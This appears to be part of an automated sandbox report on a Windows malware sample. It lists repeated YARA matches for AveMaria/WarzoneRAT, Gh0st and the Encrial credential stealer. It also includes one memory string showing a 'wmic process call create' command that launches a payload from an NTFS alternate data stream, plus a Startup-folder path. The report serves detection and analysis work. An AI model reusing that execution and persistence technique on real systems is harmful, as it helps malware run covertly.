            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Contains functionality to create processes via WMI
            Source: WMIC.exe, 00000009.00000002.306832664.000001FA873D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
